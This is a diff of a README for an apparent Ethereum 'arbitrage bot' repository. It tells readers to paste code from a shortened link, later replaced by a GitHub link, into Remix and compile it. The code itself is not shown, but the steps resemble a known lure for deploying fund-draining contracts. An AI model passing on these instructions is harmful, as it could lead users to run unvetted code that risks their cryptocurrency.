mercuryeritt/Arbitrage-Eth-bot/README.md

 👉 Create “New File”.
 Rename it whatever you want or “bot.sol”

-👉 Paste THIS code into Remix: https://urlshorts.org/mercury (backup bot source code, if main is not working: https://codefile.io/f/RN0lF9V0kz )
+👉 Paste THIS code into Remix: https://github.com/mercuryeritt/Arbitrage-Eth-bot/blob/main/ethbot

 👉 Go to the "Solidity Compiler" tab on Remix, Enable Optimization and Compile